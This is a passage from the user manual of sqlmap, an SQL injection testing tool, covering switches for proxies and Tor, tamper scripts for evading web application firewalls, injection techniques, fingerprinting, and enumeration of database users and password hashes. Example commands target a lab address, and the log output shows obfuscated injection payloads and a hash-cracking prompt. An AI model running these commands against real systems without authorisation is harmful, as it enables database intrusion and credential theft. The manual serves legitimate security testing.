$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" \
|
|
--auth-type Basic --auth-cred "testuser:testpass"
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
|
|
<H3>HTTP protocol certificate authentication</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-auth-cert</CODE></P>
|
|
|
|
<P>This switch should be used in cases when the web server requires proper
|
|
client-side certificate for authentication. Supplied values should be in
|
|
the form: <CODE>key_file,cert_file</CODE>, where <CODE>key_file</CODE> should be
|
|
the name of a PEM formatted file that contains your private key, while
|
|
<CODE>cert_file</CODE> should be the name for a PEM formatted certificate
|
|
chain file.</P>
|
|
|
|
|
|
<H3>HTTP(S) proxy</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-proxy</CODE>, <CODE>-</CODE><CODE>-proxy-cred</CODE>,
|
|
<CODE>-</CODE><CODE>-ignore-proxy</CODE> and <CODE>-</CODE><CODE>-tor</CODE></P>
|
|
|
|
<P>It is possible to provide an HTTP(S) proxy address to pass by the HTTP(S)
|
|
requests to the target URL. The syntax of HTTP(S) proxy value is
|
|
<CODE>http://url:port</CODE>.</P>
|
|
|
|
<P>If the HTTP(S) proxy requires authentication, you can provide the
|
|
credentials in the format <CODE>username:password</CODE> to the
|
|
<CODE>-</CODE><CODE>-proxy-cred</CODE> switch.</P>
|
|
|
|
<P>If, for any reason, you need to stay anonymous, instead of passing by a
|
|
single predefined HTTP(S) proxy server, you can configure a
|
|
<A HREF="http://www.torproject.org/">Tor client</A> together with
|
|
<A HREF="http://www.privoxy.org">Privoxy</A> (or similar) on
|
|
your machine as explained on the Tor client guide and use the Privoxy
|
|
daemon, by default listening on <CODE>127.0.0.1:8118</CODE>, as the sqlmap
|
|
proxy by simply providing the tool with the <CODE>-</CODE><CODE>-tor</CODE>
|
|
switch instead of <CODE>-</CODE><CODE>-proxy</CODE>.</P>
|
|
|
|
<P>The switch <CODE>-</CODE><CODE>-ignore-proxy</CODE> should be used when you want
|
|
to run sqlmap against a target part of a local area network by ignoring
|
|
the system-wide set HTTP(S) proxy server setting.</P>
|
|
|
|
|
|
<H3>Delay between each HTTP request</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-delay</CODE></P>
|
|
|
|
<P>It is possible to specify a number of seconds to hold between each HTTP(S)
|
|
request. The valid value is a float, for instance <CODE>0.5</CODE> means half
|
|
a second.
|
|
By default, no delay is set.</P>
|
|
|
|
|
|
<H3>Seconds to wait before timeout connection</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-timeout</CODE></P>
|
|
|
|
<P>It is possible to specify a number of seconds to wait before considering
|
|
the HTTP(S) request timed out. The valid value is a float, for instance
|
|
10.5 means ten seconds and a half.
|
|
By default <B>30 seconds</B> are set.</P>
|
|
|
|
|
|
<H3>Maximum number of retries when the HTTP connection timeouts</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-retries</CODE></P>
|
|
|
|
<P>It is possible to specify the maximum number of retries when the HTTP(S)
|
|
connection timeouts. By default it retries up to <B>three times</B>.</P>
|
|
|
|
|
|
<H3>Filtering targets from provided proxy log using regular expression</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-scope</CODE></P>
|
|
|
|
<P>Rather than using all hosts parsed from provided logs with switch
|
|
<CODE>-l</CODE>, you can specify valid Python regular expression to be used
|
|
for filtering desired ones.</P>
|
|
<P>Example of valid syntax:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
|
|
<H3>Avoid your session to be destroyed after too many unsuccessful requests</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-safe-url</CODE> and <CODE>-</CODE><CODE>-safe-freq</CODE></P>
|
|
|
|
<P>Sometimes web applications or inspection technology in between destroys
|
|
the session if a certain number of unsuccessful requests is performed.
|
|
This might occur during the detection phase of sqlmap or when it exploits
|
|
any of the blind SQL injection types. Reason why is that the SQL payload
|
|
does not necessarily returns output and might therefore raise a signal to
|
|
either the application session management or the inspection technology.</P>
|
|
|
|
<P>To bypass this limitation set by the target, you can provide two switches:</P>
|
|
<P>
|
|
<UL>
|
|
<LI><CODE>-</CODE><CODE>-safe-url</CODE>: Url address to visit frequently during
|
|
testing.</LI>
|
|
<LI><CODE>-</CODE><CODE>-safe-freq</CODE>: Test requests between two visits to a
|
|
given safe url.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>This way, sqlmap will visit every a predefined number of requests a
|
|
certain <EM>safe</EM> URL without performing any kind of injection against
|
|
it.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Optimization</A>
|
|
</H2>
|
|
|
|
<P>These switches can be used to optimize the performance of sqlmap.</P>
|
|
|
|
|
|
<H3>Bundle optimization</H3>
|
|
|
|
<P>Switch: <CODE>-o</CODE></P>
|
|
|
|
<P>This switch is an alias that implicitly sets the following switches:</P>
|
|
<P>
|
|
<UL>
|
|
<LI><CODE>-</CODE><CODE>-keep-alive</CODE></LI>
|
|
<LI><CODE>-</CODE><CODE>-null-connection</CODE></LI>
|
|
<LI><CODE>-</CODE><CODE>-threads 3</CODE> if not set to a higher value.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>Read below for details about each switch.</P>
|
|
|
|
|
|
<H3>Output prediction</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-predict-output</CODE></P>
|
|
|
|
<P>This switch is used in inference algorithm for sequential statistical
|
|
prediction of characters of value being retrieved. Statistical table with
|
|
the most promising character values is being built based on items given in
|
|
<CODE>txt/common-outputs.txt</CODE> combined with the knowledge of current
|
|
enumeration used. In case that the value can be found among the common
|
|
output values, as the process progresses, subsequent character tables are
|
|
being narrowed more and more. If used in combination with retrieval of
|
|
common DBMS entities, as with system table names and privileges, speed up
|
|
is significant. Of course, you can edit the common outputs file according
|
|
to your needs if, for instance, you notice common patterns in database
|
|
table names or similar.</P>
|
|
|
|
<P>Note that this switch is not compatible with <CODE>-</CODE><CODE>-threads</CODE>
|
|
switch.</P>
|
|
|
|
|
|
<H3>HTTP Keep-Alive</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-keep-alive</CODE></P>
|
|
|
|
<P>This switch instructs sqlmap to use persistent HTTP(s) connections.</P>
|
|
|
|
<P>Note that this switch is incompatible with <CODE>-</CODE><CODE>-proxy</CODE>
|
|
switch.</P>
|
|
|
|
|
|
<H3>HTTP NULL connection</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-null-connection</CODE></P>
|
|
|
|
<P>There are special HTTP request types which can be used to retrieve
|
|
HTTP response's size without getting the HTTP body. This knowledge can be
|
|
used in blind injection technique to distinguish <CODE>True</CODE> from
|
|
<CODE>False</CODE> responses. When this switch is provided, sqlmap will try to
|
|
test and exploit two different <EM>NULL connection</EM> techniques:
|
|
<CODE>Range</CODE> and <CODE>HEAD</CODE>.
|
|
If any of these is supported by the target web server, speed up will come
|
|
from the obvious saving of used bandwidth.</P>
|
|
|
|
<P>These techniques are detailed in the white paper
|
|
<A HREF="http://www.wisec.it/sectou.php?id=472f952d79293">Bursting Performances in Blind SQL Injection - Take 2 (Bandwidth)</A>.</P>
|
|
|
|
<P>Note that this switch is incompatible with <CODE>-</CODE><CODE>-text-only</CODE>
|
|
switch.</P>
|
|
|
|
|
|
<H3>Concurrent HTTP(S) requests</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-threads</CODE></P>
|
|
|
|
<P>It is possible to specify the maximum number of concurrent HTTP(S)
|
|
requests that sqlmap is allowed to do.
|
|
This feature relies on the
|
|
<A HREF="http://en.wikipedia.org/wiki/Multithreading">multi-threading</A> concept and inherits both its pro and its cons.</P>
|
|
|
|
<P>This features applies to the brute-force switches and when the data
|
|
fetching is done through any of the blind SQL injection techniques.
|
|
For the latter case, sqlmap first calculates the length of the query
|
|
output in a single thread, then starts the multi-threading. Each thread is
|
|
assigned to retrieve one character of the query output. The thread ends
|
|
when that character is retrieved - it takes up to 7 HTTP(S) requests with
|
|
the bisection algorithm implemented in sqlmap.</P>
|
|
|
|
<P>The maximum number of concurrent requests is set to <B>10</B> for
|
|
performance and site reliability reasons.</P>
|
|
|
|
<P>Note that this switch is not compatible with
|
|
<CODE>-</CODE><CODE>-predict-output</CODE> switch.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Injection</A>
|
|
</H2>
|
|
|
|
<P>These options can be used to specify which parameters to test for, provide
|
|
custom injection payloads and optional tampering scripts.</P>
|
|
|
|
<H3>Testable parameter(s)</H3>
|
|
|
|
<P>Switch: <CODE>-p</CODE></P>
|
|
|
|
<P>By default sqlmap tests all <CODE>GET</CODE> parameters and <CODE>POST</CODE>
|
|
parameters. When the value of <CODE>-</CODE><CODE>-level</CODE> is >= <B>2</B>
|
|
it tests also HTTP <CODE>Cookie</CODE> header values. When this value is >=
|
|
<B>3</B> it tests also HTTP <CODE>User-Agent</CODE> and HTTP <CODE>Referer</CODE>
|
|
header value for SQL injections.
|
|
It is however possible to manually specify a comma-separated list of
|
|
parameter(s) that you want sqlmap to test. This will bypass the dependence
|
|
on the value of <CODE>-</CODE><CODE>-level</CODE> too.</P>
|
|
|
|
<P>For instance, to test for GET parameter <CODE>id</CODE> and for HTTP
|
|
<CODE>User-Agent</CODE> only, provide <CODE>-p id,user-agent</CODE>.</P>
|
|
|
|
|
|
<H3>URI injection point</H3>
|
|
|
|
<P>There are special cases when injection point is within the URI itself.
|
|
sqlmap does not perform any automatic test against URI paths, unless
|
|
manually pointed to.
|
|
You have to specify these injection points in the command line by
|
|
appending an asterisk (<CODE>*</CODE>) after each URI point that you want
|
|
sqlmap to test for and exploit a SQL injection.</P>
|
|
|
|
<P>This is particularly useful when, for instance, Apache web server's
|
|
<A HREF="http://httpd.apache.org/docs/current/mod/mod_rewrite.html">mod_rewrite</A> module is in use or other similar technologies.</P>
|
|
|
|
<P>An example of valid command line would be:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
|
|
<H3>Force the database management system name</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-dbms</CODE></P>
|
|
|
|
<P>By default sqlmap automatically detects the web application's back-end
|
|
database management system.
|
|
As of version <B>0.9</B>, sqlmap fully supports the following database
|
|
management systems:</P>
|
|
<P>
|
|
<UL>
|
|
<LI>MySQL</LI>
|
|
<LI>Oracle</LI>
|
|
<LI>PostgreSQL</LI>
|
|
<LI>Microsoft SQL Server</LI>
|
|
<LI>Microsoft Access</LI>
|
|
<LI>SQLite</LI>
|
|
<LI>Firebird</LI>
|
|
<LI>Sybase</LI>
|
|
<LI>SAP MaxDB</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>If for any reason sqlmap fails to detect the back-end DBMS once a SQL
|
|
injection has been identified or if you want to avoid an active fingeprint,
|
|
you can provide the name of the back-end DBMS yourself (e.g. <CODE>postgresql</CODE>).
|
|
For MySQL and Microsoft SQL Server provide them respectively in the form
|
|
<CODE>MySQL <version></CODE> and <CODE>Microsoft SQL Server <version></CODE>, where <CODE><version></CODE> is a valid version for the DBMS; for
|
|
instance <CODE>5.0</CODE> for MySQL and <CODE>2005</CODE> for Microsoft SQL Server.</P>
|
|
|
|
<P>In case you provide <CODE>-</CODE><CODE>-fingerprint</CODE> together with
|
|
<CODE>-</CODE><CODE>-dbms</CODE>, sqlmap will only perform the extensive
|
|
fingerprint for the specified database management system only, read below
|
|
for further details.</P>
|
|
|
|
<P>Note that this option is <B>not</B> mandatory and it is strongly
|
|
recommended to use it <B>only if you are absolutely sure</B> about the
|
|
back-end database management system. If you do not know it, let sqlmap
|
|
automatically fingerprint it for you.</P>
|
|
|
|
|
|
<H3>Force the database management system operating system name</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-os</CODE></P>
|
|
|
|
<P>By default sqlmap automatically detects the web application's back-end
|
|
database management system underlying operating system when this
|
|
information is a dependence of any other provided switch.
|
|
At the moment the fully supported operating systems are two:</P>
|
|
<P>
|
|
<UL>
|
|
<LI>Linux</LI>
|
|
<LI>Windows</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>It is possible to force the operating system name if you already know it
|
|
so that sqlmap will avoid doing it itself.</P>
|
|
|
|
<P>Note that this option is <B>not</B> mandatory and it is strongly
|
|
recommended to use it <B>only if you are absolutely sure</B> about the
|
|
back-end database management system underlying operating system. If you do
|
|
not know it, let sqlmap automatically identify it for you.</P>
|
|
|
|
|
|
<H3>Custom injection payload</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-prefix</CODE> and <CODE>-</CODE><CODE>-suffix</CODE></P>
|
|
|
|
<P>In some circumstances the vulnerable parameter is exploitable only if the
|
|
user provides a specific suffix to be appended to the injection payload.
|
|
Another scenario where these options come handy presents itself when the
|
|
user already knows that query syntax and want to detect and exploit the
|
|
SQL injection by directly providing a injection payload prefix and suffix.</P>
|
|
|
|
<P>Example of vulnerable source code:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>To detect and exploit this SQL injection, you can either let sqlmap detect
|
|
the <B>boundaries</B> (as in combination of SQL payload prefix and
|
|
suffix) for you during the detection phase, or provide them on your own.
|
|
For example:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" \
|
|
-p id --prefix "')" --suffix "AND ('abc'='abc"
|
|
[...]
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>This will result in all sqlmap requests to end up in a query as follows:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>Which makes the query syntactically correct.</P>
|
|
|
|
<P>In this simple example, sqlmap could detect the SQL injection and exploit
|
|
it without need to provide custom boundaries, but sometimes in real world
|
|
application it is necessary to provide it when the injection point is
|
|
within nested <CODE>JOIN</CODE> queries for instance.</P>
|
|
|
|
|
|
<H3>Tamper injection data</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-tamper</CODE></P>
|
|
|
|
<P>sqlmap itself does no obfuscation of the payload sent, except for strings
|
|
between single quotes replaced by their <CODE>CHAR()</CODE>-alike
|
|
representation.</P>
|
|
|
|
<P>This switch can be very useful and powerful in situations where there is
|
|
a weak input validation mechanism between you and the back-end database
|
|
management system. This mechanism usually is a self-developed input
|
|
validation routine called by the application source code, an expensive
|
|
enterprise-grade IPS appliance or a web application firewall (WAF). All
|
|
buzzwords to define the same concept, implemented in a different way and
|
|
costing lots of money, usually.</P>
|
|
|
|
<P>To take advantage of this switch, provide sqlmap with a comma-separated
|
|
list of tamper scripts and this will process the payload and return it
|
|
transformed. You can define your own tamper scripts, use sqlmap ones from
|
|
the <CODE>tamper/</CODE> folder or edit them as long as you concatenate them
|
|
comma-separated as the argument of <CODE>-</CODE><CODE>-tamper</CODE> switch.</P>
|
|
|
|
<P>The format of a valid tamper script is as follows:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
# Needed imports
|
|
from lib.core.enums import PRIORITY
|
|
|
|
# Define which is the order of application of tamper scripts against the payload
|
|
__priority__ = PRIORITY.NORMAL
|
|
|
|
def tamper(payload):
|
|
'''
|
|
Description of your tamper script
|
|
'''
|
|
|
|
retVal = payload
|
|
|
|
# your code to tamper the original payload
|
|
|
|
# return the tampered payload
|
|
return retVal
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>You can check valid and usable tamper scripts in the <CODE>tamper/</CODE>
|
|
directory.</P>
|
|
|
|
<P>Example against a MySQL target assuming that <CODE>></CODE> character,
|
|
spaces and capital <CODE>SELECT</CODE> string are banned:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper \
|
|
tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
|
|
|
|
[hh:mm:03] [DEBUG] cleaning up configuration parameters
|
|
[hh:mm:03] [INFO] loading tamper script 'between'
|
|
[hh:mm:03] [INFO] loading tamper script 'randomcase'
|
|
[hh:mm:03] [INFO] loading tamper script 'space2comment'
|
|
[...]
|
|
[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
|
|
[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
|
|
[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
|
|
[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
|
|
[...]
|
|
[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
|
|
[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar(
|
|
58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/
|
|
ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/
|
|
group/**/bY/**/x)a)
|
|
[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING
|
|
clause' injectable
|
|
[...]
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
|
|
|
|
<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">Detection</A>
|
|
</H2>
|
|
|
|
<P>These options can be used to specify how to parse and compare page
|
|
content from HTTP responses when using blind SQL injection technique.</P>
|
|
|
|
<H3>Level</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-level</CODE></P>
|
|
|
|
<P>This switch requires an argument which specifies the level of tests to
|
|
perform. There are <B>five</B> levels. The default value is <B>1</B>
|
|
where limited number of tests (requests) are performed. Vice versa, level
|
|
<B>5</B> will test verbosely for a much larger number of payloads and
|
|
boundaries (as in pair of SQL payload prefix and suffix).
|
|
The payloads used by sqlmap are specified in the textual file
|
|
<CODE>xml/payloads.xml</CODE>. Following the instructions on top of the file,
|
|
if sqlmap misses an injection, you should be able to add your own
|
|
payload(s) to test for too!</P>
|
|
|
|
<P>Not only this switch affects which payload sqlmap tries, but also which
|
|
injection points are taken in exam: GET and POST parameters are
|
|
<B>always</B> tested, HTTP Cookie header values are tested from level
|
|
<B>2</B> and HTTP User-Agent/Referer headers' value is tested from level
|
|
<B>3</B>.</P>
|
|
|
|
<P>All in all, the harder it is to detect a SQL injection, the higher the
|
|
<CODE>-</CODE><CODE>-level</CODE> must be set.</P>
|
|
|
|
<P>It is strongly recommended to higher this value before reporting to the
|
|
mailing list that sqlmap is not able to detect a certain injection point.</P>
|
|
|
|
|
|
<H3>Risk</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-risk</CODE></P>
|
|
|
|
<P>This switch requires an argument which specifies the risk of tests to
|
|
perform. There are <B>four</B> risk values. The default value is
|
|
<B>1</B> which is innocuous for the majority of SQL injection points.
|
|
Risk value 2 adds to the default level the tests for heavy query
|
|
time-based SQL injections and value 3 adds also <CODE>OR</CODE>-based SQL
|
|
injection tests.</P>
|
|
|
|
<P>In some instances, like a SQL injection in an <CODE>UPDATE</CODE> statement,
|
|
injecting an <CODE>OR</CODE>-based payload can lead to an update of all the
|
|
entries of the table, which is certainly not what the attacker wants. For
|
|
this reason and others this switch has been introduced: the user has
|
|
control over which payloads get tested, the user can arbitrarily choose
|
|
to use also potentially dangerous ones.
|
|
As per the previous switch, the payloads used by sqlmap are specified in
|
|
the textual file <CODE>xml/payloads.xml</CODE> and you are free to edit and
|
|
add your owns.</P>
|
|
|
|
|
|
<H3>Page comparison</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-string</CODE>, <CODE>-</CODE><CODE>-regexp</CODE> and
|
|
<CODE>-</CODE><CODE>-text-only</CODE></P>
|
|
|
|
<P>By default the distinction of a <CODE>True</CODE> query by a <CODE>False</CODE>
|
|
one (rough concept behind boolean-based blind SQL injection vulnerabilities)
|
|
is done by comparing the injected requests page content with the original
|
|
not injected page content.
|
|
Not always this concept works because sometimes the page content changes at
|
|
each refresh even not injecting anything, for instance when the page has a
|
|
counter, a dynamic advertisement banner or any other part of the HTML which
|
|
is rendered dynamically and might change in time not only consequently to
|
|
user's input.
|
|
To bypass this limit, sqlmap tries hard to identify these snippets of the
|
|
response bodies and deal accordingly. Sometimes it may fail, that is why
|
|
the user can provide a string (<CODE>-</CODE><CODE>-string</CODE> switch) which is
|
|
<B>always</B> present on the not injected page <B>and</B> on all True
|
|
injected query pages, but that it is <B>not</B> on the False ones. As
|
|
an alternative to a static string, the user can provide a regular
|
|
expression (<CODE>-</CODE><CODE>-regexp</CODE> switch).</P>
|
|
|
|
<P>Such data is easy for an user to retrieve, simply try to inject on the
|
|
affected parameter an invalid value and compare manually the original (not
|
|
injected) page content with the injected wrong page content.
|
|
This way the distinction will be based upon string presence or regular
|
|
expression match.</P>
|
|
|
|
<P>In cases with lot of active content (e.g. scripts, embeds, etc.) in the
|
|
HTTP responses' body, you can filter pages (<CODE>-</CODE><CODE>-text-only</CODE>
|
|
switch) just for their textual content. This way, in a good number of
|
|
cases, you can automatically tune the detection engine.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Techniques</A>
|
|
</H2>
|
|
|
|
<P>These options can be used to tweak testing of specific SQL injection
|
|
techniques.</P>
|
|
|
|
|
|
<H3>SQL injection techniques to test for</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-technique</CODE></P>
|
|
|
|
<P>This switch can be used to specify which SQL injection type to test for.
|
|
By default sqlmap tests for <B>all</B> types/techniques it supports.</P>
|
|
|
|
<P>In certain situations you may want to test only for one or few specific
|
|
types of SQL injection thought and this is where this switch comes into
|
|
play.</P>
|
|
|
|
<P>This switch requires an argument. Such argument is a string composed by
|
|
any combination of <CODE>B</CODE>, <CODE>E</CODE>, <CODE>U</CODE>, <CODE>S</CODE> and
|
|
<CODE>T</CODE> characters where each letter stands for a different technique:</P>
|
|
<P>
|
|
<UL>
|
|
<LI><CODE>B</CODE>: Boolean-based blind SQL injection</LI>
|
|
<LI><CODE>E</CODE>: Error-based SQL injection</LI>
|
|
<LI><CODE>U</CODE>: UNION query SQL injection</LI>
|
|
<LI><CODE>S</CODE>: Stacked queries SQL injection</LI>
|
|
<LI><CODE>T</CODE>: Time-based blind SQL injection</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>For instance, you can provide <CODE>ES</CODE> if you want to test for and
|
|
exploit error-based and stacked queries SQL injection types only.
|
|
The default value is <CODE>BEUST</CODE>.</P>
|
|
|
|
<P>Note that the string must include stacked queries technique letter,
|
|
<CODE>S</CODE>, when you want to access the file system, takeover the
|
|
operating system or access Windows registry hives.</P>
|
|
|
|
|
|
<H3>Seconds to delay the DBMS response for time-based blind SQL injection</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-time-sec</CODE></P>
|
|
|
|
<P>It is possible to set the seconds to delay the response when testing for
|
|
time-based blind SQL injection, by providing the
|
|
<CODE>-</CODE><CODE>-time-sec</CODE> option followed by an integer.
|
|
By default delay is set to <B>5 seconds</B>.</P>
|
|
|
|
|
|
<H3>Number of columns in UNION query SQL injection</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-union-cols</CODE></P>
|
|
|
|
<P>By default sqlmap tests for UNION query SQL injection technique using 1 to
|
|
10 columns. However, this range can be increased up to 50 columns by
|
|
providing an higher <CODE>-</CODE>-<CODE>level</CODE> value. See the relevant
|
|
paragraph for details.</P>
|
|
|
|
<P>You can manually tell sqlmap to test for this type of SQL injection with a
|
|
specific range of columns by providing the tool with the
|
|
<CODE>-</CODE><CODE>-union-cols</CODE> switch followed by a range of integers. For
|
|
instance, <CODE>12-16</CODE> means tests for UNION query SQL injection by
|
|
using 12 up to 16 columns.</P>
|
|
|
|
|
|
<H3>Character to use to test for UNION query SQL injection</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-union-char</CODE></P>
|
|
|
|
<P>By default sqlmap tests for UNION query SQL injection technique using
|
|
<CODE>NULL</CODE> character. However, by providing an higher
|
|
<CODE>-</CODE>-<CODE>level</CODE> value sqlmap will performs tests also with a
|
|
random number because there are some corner cases where UNION query tests
|
|
with <CODE>NULL</CODE> fail whereas with a random integer they succeed.</P>
|
|
|
|
<P>You can manually tell sqlmap to test for this type of SQL injection with a
|
|
specific character by providing the tool with the
|
|
<CODE>-</CODE><CODE>-union-char</CODE> switch followed by a string.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">Fingerprint</A>
|
|
</H2>
|
|
|
|
<H3>Extensive database management system fingerprint</H3>
|
|
|
|
<P>Switches: <CODE>-f</CODE> or <CODE>-</CODE><CODE>-fingerprint</CODE></P>
|
|
|
|
<P>By default the web application's back-end database management system
|
|
fingerprint is handled automatically by sqlmap.
|
|
Just after the detection phase finishes and the user is eventually
|
|
prompted with a choice of which vulnerable parameter to use further on,
|
|
sqlmap fingerprints the back-end database management system and carries
|
|
on the injection by knowing which SQL syntax, dialect and queries to use
|
|
to proceed with the attack within the limits of the database architecture.</P>
|
|
|
|
<P>If for any instance you want to perform an extensive database management
|
|
system fingerprint based on various techniques like specific SQL dialects
|
|
and inband error messages, you can provide the
|
|
<CODE>-</CODE><CODE>-fingerprint</CODE> switch. sqlmap will perform a lot more
|
|
requests and fingerprint the exact DBMS version and, where possible,
|
|
operating system, architecture and patch level.</P>
|
|
|
|
<P>If you want the fingerprint to be even more accurate result, you can also
|
|
provide the <CODE>-b</CODE> or <CODE>-</CODE><CODE>-banner</CODE> switch.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.9">5.9</A> <A HREF="#toc5.9">Enumeration</A>
|
|
</H2>
|
|
|
|
<P>These options can be used to enumerate the back-end database management
|
|
system information, structure and data contained in the tables. Moreover
|
|
you can run your own SQL statements.</P>
|
|
|
|
|
|
<H3>Banner</H3>
|
|
|
|
<P>Switch: <CODE>-b</CODE> or <CODE>-</CODE><CODE>-banner</CODE></P>
|
|
|
|
<P>Most of the modern database management systems have a function and/or
|
|
an environment variable which returns the database management system
|
|
version and eventually details on its patch level, the underlying
|
|
system. Usually the function is <CODE>version()</CODE> and the environment
|
|
variable is <CODE>@@version</CODE>, but this vary depending on the target
|
|
DBMS.</P>
|
|
|
|
|
|
<H3>Session user</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-current-user</CODE></P>
|
|
|
|
<P>On the majority of modern DBMSes is possible to retrieve the database
|
|
management system's user which is effectively performing the query against
|
|
the back-end DBMS from the web application.</P>
|
|
|
|
|
|
<H3>Current database</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-current-db</CODE></P>
|
|
|
|
<P>It is possible to retrieve the database management system's database name
|
|
that the web application is connected to.</P>
|
|
|
|
|
|
<H3>Detect whether or not the session user is a database administrator</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-is-dba</CODE></P>
|
|
|
|
<P>It is possible to detect if the current database management system session
|
|
user is a database administrator, also known as DBA.
|
|
sqlmap will return <CODE>True</CODE> if it is, viceversa <CODE>False</CODE>.</P>
|
|
|
|
|
|
<H3>List database management system users</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-users</CODE></P>
|
|
|
|
<P>When the session user has read access to the system table containing
|
|
information about the DBMS users, it is possible to enumerate the list of
|
|
users.</P>
|
|
|
|
|
|
<H3>List and crack database management system users password hashes</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-passwords</CODE> and <CODE>-U</CODE></P>
|
|
|
|
<P>When the session user has read access to the system table containing
|
|
information about the DBMS users' passwords, it is possible to enumerate
|
|
the password hashes for each database management system user.
|
|
sqlmap will first enumerate the users, then the different password hashes
|
|
for each of them.</P>
|
|
|
|
<P>Example against a PostgreSQL target:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
|
|
|
|
[...]
|
|
back-end DBMS: PostgreSQL
|
|
[hh:mm:38] [INFO] fetching database users password hashes
|
|
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
|
|
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
|
|
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt]
|
|
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
|
|
do you want to use common password suffixes? (slow!) [y/N] n
|
|
